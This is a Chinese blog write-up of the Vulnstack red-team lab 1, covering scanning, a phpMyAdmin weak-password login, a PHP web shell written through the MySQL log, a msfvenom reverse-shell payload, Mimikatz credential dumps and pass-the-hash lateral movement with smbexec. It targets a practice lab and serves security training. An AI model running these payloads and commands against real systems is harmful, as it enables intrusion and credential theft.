Vulnstack-内网靶场1-通关解析

于 2024-04-12 10:24:46 发布
阅读量371 收藏 5
点赞数 4
文章标签: web安全 网络安全 安全 代码复审
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75816146/article/details/137671309
版权 
Kali
192.168.35.128
===============================================================================
第一层靶机 Win7
192.168.35.153
192.168.52.143
===============================================================================
第二层靶机 Metaploitable
192.168.52.141
===============================================================================
第三层靶机 WinServer2008
192.168.52.138

第一层主机

存活主机扫描

  • nmap -sP 192.168.35.0/24
└─# nmap -sP 192.168.35.0/24
===================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:43 EST
Nmap scan report for 192.168.35.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.35.2
Host is up (0.00012s latency).
MAC Address: 00:50:56:F0:F5:B1 (VMware)
Nmap scan report for 192.168.35.153   =====>   疑似存活主机
Host is up (0.00019s latency).
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Nmap scan report for 192.168.35.254
Host is up (0.00012s latency).
MAC Address: 00:50:56:EC:7B:6C (VMware)
Nmap scan report for 192.168.35.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.98 seconds

192.168.35.135 ===> 疑似存活主机IP地址

端口扫描

  • nmap -PS 192.168.35.153
└─# nmap -PS 192.168.35.153 
==============================================================================
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-03 21:45 EST
Nmap scan report for 192.168.35.153
Host is up (0.00034s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
3306/tcp open  mysql
MAC Address: 00:0C:29:A7:C1:B2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.02 seconds

信息收集

访问 192.168.35.143:80

网站首页名字:phpStudy探针2014
绝对路径:C:/phpStudy/WWW
探针路径:C:/phpStudy/WWW/l.php
Php版本:5.4.45

目录扫描

[22:11:24] 200 -   71KB - /phpinfo.php                              
[22:11:24] 301 -  241B  - /phpMyAdmin  ->  http://192.168.35.153/phpMyAdmin/
[22:11:24] 301 -  241B  - /phpmyadmin  ->  http://192.168.35.153/phpmyadmin/
[22:11:25] 200 -    2KB - /phpmyadmin/README                                
[22:11:25] 200 -   32KB - /phpmyadmin/ChangeLog                             
[22:11:25] 200 -    4KB - /phpmyadmin/index.php                             
[22:11:25] 200 -    4KB - /phpMyAdmin/index.php                             
[22:11:25] 200 -    4KB - /phpmyAdmin/
[22:11:25] 200 -    4KB - /phpmyadmin/                                      
[22:11:25] 200 -    4KB - /phpMyAdmin/                                      
[22:11:25] 200 -    4KB - /phpMyadmin/

Phpmyadmin

测试弱密码

  • 账号:root
  • 密码:root

网上搜索phpmyadmin历史漏洞

其复现步骤如下

general log:off  ===> general log:on
general log file ===> C:/phpStudy/WWW/1.php

payload:   SELECT '<?php @eval($_REQUEST[6]);?>' 
==> 注意这里使用'' 因为使用双引号会报错

获取shell

蚁剑测试连接

提权

方法一:MsfVenom

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.35.128 LPORT=9527 -f exe > shell.exe

上传木马文件到目标主机,然后kali使用multi/handler模块进行监听,然后在蚁剑运行上传的木马文件,即可获取权限,这一次直接提权即可

meterpreter > getuid
Server username: GOD\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

方法二:CS

利用kali、win10开启CS

CS生成木马文件,将木马文件上传到目标服务器,运行,然后直接进行提权

第二层主机

信息收集

因为第一层主机权限已经拿下,我们便以此为跳板对内网进行扫描

首先ipconfig看一下IP地址

发现了有2个ip地址

192.168.35.153

192.168.52.143

====> 并发现有域的存在

域名 主 DNS 后缀 . . . . . . . . . . . : god.org

kali 挂代理扫描内网

说明192.168.52.0/24网段是内网的网段,我们需要挂代理进行内网渗透

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.52.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.35.153
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.52.0       255.255.255.0      Session 1

没有192.168.52.0/24网段 则表示我们无法访问到内网的网址,所以我们需要添加路由进行设置

运行 proxychains4 nmap -sP 192.168.52.0/24

结果:全部C段网站都存活 ===> 挂代理用kali扫不动,于是便换成CS进行C段扫描

CS扫描内网存活主机

将nbtscan上传至目标服务器,然后运行

发现存活主机

  • 192.168.52.138

  • 192.168.52.141

  • 192.168.52.143 ==>本机IP

端口扫描

beacon> portscan 192.168.52.0-192.168.52.255 23,3389,445 arp 1024
[*] Tasked beacon to scan ports 23,3389,445 on 192.168.52.0-192.168.52.255
[+] host called home, sent: 93285 bytes
[+] received output:
(ARP) Target '192.168.52.1' is alive. 00-50-56-C0-00-01

[+] received output:
(ARP) Target '192.168.52.143' is alive. 00-0C-29-A7-C1-A8
(ARP) Target '192.168.52.138' is alive. 00-0C-29-3F-5D-A9
(ARP) Target '192.168.52.141' is alive. 00-0C-29-6D-39-34

[+] received output:
(ARP) Target '192.168.52.254' is alive. 00-50-56-F3-FB-8A

[+] received output:
192.168.52.1:445
192.168.52.138:445 (platform: 500 version: 6.1 name: OWA domain: GOD)
192.168.52.141:445 (platform: 500 version: 5.2 name: ROOT-TVI862UBEH domain: GOD)
192.168.52.143:445 (platform: 500 version: 6.1 name: STU1 domain: GOD)
Scanner module is complete

总结:445端口都处于开启的状态,这时候我们可以使用PTH

横向移动

先利用我们获取到的权限将目标主机的hash拿到

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82541 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



7f274332b7a2e4623bb7d86fb340c8f3

结合之前端口扫描,我们使用exploit/windows/smb/psexec模块,然后进行横向渗透

结果都寄!!!

然后我们使用了impacket这个工具进行横向渗透,点击Run Mimikatz

Authentication Id : 0 ; 1906011 (00000000:001d155b)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2024/3/4 17:02:13
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * LM       : 6139ff1072a8d0fe1e929ffc01395127
	 * NTLM     : 7f274332b7a2e4623bb7d86fb340c8f3    ========> 此处对应的hash值不同于上述的hash值,去查询后发现这里的hash值正是对应的密码Aa@123456
	 * SHA1     : fbf44607ca7c0e989adee2673478f81266a4d3fe
	tspkg :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : Aa@123456
	wdigest :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : Aa@123456
	kerberos :	
	 * Username : Administrator
	 * Domain   : GOD.ORG
	 * Password : Aa@123456
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/3/4 17:01:40
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2024/3/4 17:01:40
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : STU1$
	 * Domain   : GOD
	 * NTLM     : 8e13aa48490fd42d88155fdc788ac265
	 * SHA1     : 41a638b7124b34680806801699a0310d1cdeb483
	tspkg :	
	wdigest :	
	 * Username : STU1$
	 * Domain   : GOD
	 * Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d 
	kerberos :	
	 * Username : stu1$
	 * Domain   : GOD.ORG
	 * Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d 
	ssp :	
	credman :	

Authentication Id : 0 ; 52183 (00000000:0000cbd7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/3/4 17:01:40
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : STU1$
	 * Domain   : GOD
	 * NTLM     : 8e13aa48490fd42d88155fdc788ac265
	 * SHA1     : 41a638b7124b34680806801699a0310d1cdeb483
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2024/3/4 17:01:40
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : STU1$
	 * Domain   : GOD
	 * Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d 
	kerberos :	
	 * Username : stu1$
	 * Domain   : GOD.ORG
	 * Password : 1d 0c f2 4b 68 fc dd 8d d0 ab 78 6f 91 2b a5 cd e0 61 29 7f dc b9 56 3d 82 fe ea 29 8b 51 ee a9 e3 b3 bb 15 2d 43 79 2c ce a2 4a 42 a3 14 97 d9 8c 04 98 00 5a 75 72 e6 cb d7 b0 a8 72 87 db c0 04 d0 f0 9c 09 7d 6e 0a a7 b1 bb 05 bd ec 09 8d 8c a0 90 fc ad 8d 34 05 28 2e 94 31 af fa fd 12 da 56 24 cc b1 d4 c1 ed f1 74 94 28 95 59 6f 5d b9 25 03 8a 45 a0 1f 5b 98 d5 e0 3c 09 35 eb dd 1d f8 fa a5 2b 46 39 e0 ac e2 e1 f6 b3 8e 9a 01 15 a3 92 0c 6c c5 92 cd 45 63 04 65 a2 3a 17 ac 19 62 1e 1e 57 2a 12 43 ce 82 e4 4c c1 5c 96 09 f5 b6 60 eb 55 eb ac 33 9d 1b 54 39 5e b7 6c 02 71 67 a4 72 01 b4 b7 fb eb 96 10 42 52 8a cb ba 91 b1 7f 91 4d dd 3a a7 2c b3 d5 41 27 7e b7 c9 10 cd 37 0b ad 2c 6f 57 aa 8e 75 7b 5b c3 91 2d 
	ssp :	
	credman :
  • python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.141
  • python3 smbexec.py -hashes :7f274332b7a2e4623bb7d86fb340c8f3 GOD/Administrator@192.168.52.138

输入上述命令即可横向移动

拿到后续2台服务器的权限

小小小屿屿屿
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux-开发环境域名代理服务
08-13
开发环境域名代理服务,本地开发环境代理和配置
vulnstack1 渗透分析 红日靶场(一)
最新发布
黑战士的博客
03-22 1135
当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在mysqld内加入secure_file_priv =“”。当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW。选择psexec横向移动。
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3510
靶场环境配置: 修改为usb1.0同时新建络,把络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内环境中 切记 vmware和virtualbox的虚拟卡可能段不同 所以要保证kali和靶机在同一个段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
Vulnstack红日安全内域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外打点MySQL写日志GetshellCMS后台上传GetShell内渗透靶机CS后门上线内域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内渗透,本文将学习并记录红日安全团队提供的一个内域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,络拓扑如下: 2、从络拓扑图得知,需要模拟内和外两个段, Win7 虚拟机相当于关服务器,所以需要两张卡,故需要配置两个络适配器(卡),点击
VulnStack-ATT&CK-3(红日靶场三)
buffedon的博客
07-12 8530
VulnStack-ATT&CK-31. 环境配置2. 信息收集目标机端口扫描目录扫描3. 漏洞利用远程连接web的MySQL登录后台写一句话木马连接木马文件getshell4. 内渗透内信息收集脏牛漏洞提权内渗透,建立监听路由转发Sock代理Socks5代理5. 横向移动NTLM Relay 攻击定位域管理员meterpreter的kiwi模块抓取密码使用获取到的密码控制 win7进攻域控(win 2012)6. 问题总结 1. 环境配置 此图仅供参考,IP地址有误 首先添加一张卡(仅主
渗透测试之Vulnstack1内域渗透
LvHLong的博客
04-27 3284
使用dirsearch扫描目录 python dirsearch.py -u http://192.168.234.177/ -i 200,301 发现备份文件 beifen.rar 和 phpmyadmin 使用 Nmap 扫描
【红日靶场】vulnstack1-完整渗透过程
信安是不可或缺的一部分!
09-26 1085
大家有兴趣可以尝试获取,也可以通过上披露的已知漏洞进行攻击,也可以做深入的代码审计方法很多,包括使用永痕之蓝漏洞,msf可以直接提到system权限,这里不在继续。没有识别到杀软,可以做msf上线或者做内穿透或者冰蝎隧道(不推荐),看个人选择,也可以上线cs,做横向移动或者权限维持,这里我选择做简单的权限维持。因为版本很多已知漏洞无法使用有一些POC:https://www.exploit-db.com/exploits/25003。上传图片成功但是需要审核:这里就不能上传了,找一下后台登录点。
红日靶机vulnstack01【精华总结】
qq_45300786的博客
07-22 2804
总结:一 如果3389开放,但是用防火墙:那么有3中方法突破 1、msf反弹shell,然后使用run post/windows/manage/enable_rdp,意思是防火墙允许远程桌面 2、msf反弹shell,命令行直接添加防火墙3389开放规则 netsh advfirewall firewall add rule name=“Open 3389” dir=in action=allow protocol=TCP localport=3389 3、使用隧道:目标机有防火墙的话,我们是被目标机防火墙
Vulnstack(一)
iO快到碗里来
11-12 9449
0x00 Preface 上有很多关于 Vulnstack(一) 的优质文章,本篇文章仅用于记录笔者自身的学习过程。 0x01 环境准备 共有三台机器,Win7是对外的web机,win2003和win2008是内机器。 VM1(Win7)添加一块卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式) VM2(Win2003)卡设置为:VMnet1(仅主机模式) VM2(Win2008)卡设置为:VMnet1(仅主机模式) 打开Win2003、Win2008,输入默认
vulnstack(一)
qq_63928796的博客
03-17 721
三台机器在同一内中,win7 web服务开放在外,只能通过拿下win7后将其作为跳板进行横向渗透,拿下win2008和win2003服务器。就可以了。
-安全攻防-笔记.pdf
09-18
-安全攻防-笔记.pdf
107-渗透工具分享1
08-03
1. 关于正向shell和反向shell在内渗透时与代理工具的结合应用的方式 2. 手工修改linux路由表进行络穿透的方法 3. 内渗透中常见的漏洞有哪
渗透之端口转发-代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内机器上执行:lcx.exe –slave 公 IP + 端
神卓互联-穿透客户端
10-15
无需公IP、无需设置路由器转发、下载安装即可使用,非常方便、神卓互联客户端已经过微软官签名认证,放心使用。
vulnstack1--红队靶机
m0_73248913的博客
03-10 383
注意一下这个密码你改了密码的话需要写你自己的密码(正确的做法应该是利用永恒之蓝吧)由于这个是phpstudy搭建的他的默认密码就是root:root。配置出错了不是一个段就没能链接上去我就吧win7桥接换成了nat。大概率outfile不能使用(phpstudy默认不开启)修改一下日志存放的路径(phpinfo中有绝对路径)看了好几遍都不知道是啥问题,算了用小马拉大马。没有更多的信息只能尝试mysql的弱口令。提权一下吧,这个里面是有防火墙的。记得修改一下里面‘“是混用的。往里面写一个反弹shell。
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 736
查看了一下,把敏感信息收集起来,比如站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个卡,分别是192.168.22.133(外)和192.168.52.143(内)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内机器。
vulnstack内渗透环境靶场-1 大全
鸣蜩十四的博客
08-19 2913
一.搭建vulnstack靶场环境 主要以真实企业环境为实例搭建一系列靶场,通过练习另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 这次靶场一共三个环境,win7,win2003,win2008,win7是web服务器,上面我们需要两张卡,一张nat模式,一张主机模式,win2003是域成员,win2008为域控 Win7配置如下: 在win7中使用phpstudy开
渗透靶场--vulnstack-红队评估实战(5)
weixin_45794666的博客
07-20 764
vulnstack-红队评估实战(5) 环境配置 win7 sun\heart 123.com sun\Administrator dc123.com 内:192.168.138.136 外:192.168.154.140 启动phpstudy 2008 sun\admin 2021.com 192.168.138.138 kali 192.168.154.129 1.对外主机进行信息搜集 开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22 搜索
esp32-cam内穿透
07-23
ESP32-CAM是一款集成了摄像头模块和ESP32芯片的开发板,用于物联应用和远程监控等项目。由于其具有微型化、低功耗、高性能等特点,越来越多的人开始使用它来搭建家庭监控系统。 内穿透是指将局域内的设备或服务器通过互联使外部络能够访问的一种技术。对于ESP32-CAM来说,内穿透可以使我们在外部络环境中通过互联对其进行访问和控制,而不仅仅局限于局域内。 要实现ESP32-CAM的内穿透,我们可以借助第三方服务商提供的云服务器或者自建服务器。通常的做法是将ESP32-CAM连接到一个局域中的路由器,并在路由器中设置端口转发规则,将ESP32-CAM所在的局域IP地址和端口映射到外的某个端口上。这样一来,当我们知道外的IP地址和映射的端口后,就可以通过访问这个地址和端口来访问ESP32-CAM。 同时,我们还需要在ESP32-CAM上编写相应的代码,使其能够连接到云服务器或自建服务器。这些服务器会提供一个公地址,让ESP32-CAM能够与之建立通信连接。 总结起来,ESP32-CAM内穿透的关键步骤包括:连接到局域、设置路由器端口转发规则、搭建云服务器或自建服务器、编写ESP32-CAM的代码进行连接。这样,就可以实现在外环境中对ESP32-CAM进行访问和控制了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值